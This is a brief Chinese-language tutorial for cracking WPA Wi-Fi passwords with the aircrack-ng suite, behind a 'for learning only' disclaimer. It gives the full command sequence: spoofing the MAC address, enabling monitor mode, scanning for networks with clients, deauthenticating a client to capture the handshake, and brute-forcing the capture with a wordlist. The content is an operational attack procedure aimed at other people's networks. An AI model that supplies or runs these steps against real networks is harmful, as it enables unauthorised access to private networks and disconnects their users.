声明:本教程仅供学习用,不得用于任何非法活动,造成的一切后果本人概不负责!
步骤:
1. 修改自己的MAC地址
# ifconfig wlan0 down
# macchanger -m 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
2. 启动监听
# airmon-ng start wlan0
3. 修改mon0的MAC地址
# ifconfig mon0 down
# macchanger -m 00:11:22:33:44:55 mon0
# ifconfig mon0 up
4. 列出所有可扫描的网络列表
# airodump-ng mon0
5. 仔细找到有Station的那个网络,记下BSSID,再单独扫描该网络,并把结果写入crack_cap文件中(后面的抓握手包同样会保存在里面)
# airodump-ng -w crack_cap --bssid xx:xx:xx:xx:xx mon0
6. 开另一个Terminal抓握手包,将AP_BSSID改成上面找到的BSSID,将Station_BSSID改成上面对应的Station的BSSID
# aireplay-ng -0 -4 -a <AP_BSSID> -c <Station_BSSID> mon0
7. 在进行上一步时仔细观察第一个Terminal的上面有没有显示Handshake,如没有,重复第6步,直至出现该字样
8. 拿到握手包后就开始进行破解了,dict.txt是密码字典文件, crack_cap.cap是之前保存写入的文件,里面包括握手包
# aircrack-ng crack_cap.cap -w dict.txt
9. 现在就是等待时间了,如果没有找到密码,尝试找另一个密码字典文件,再重复第8步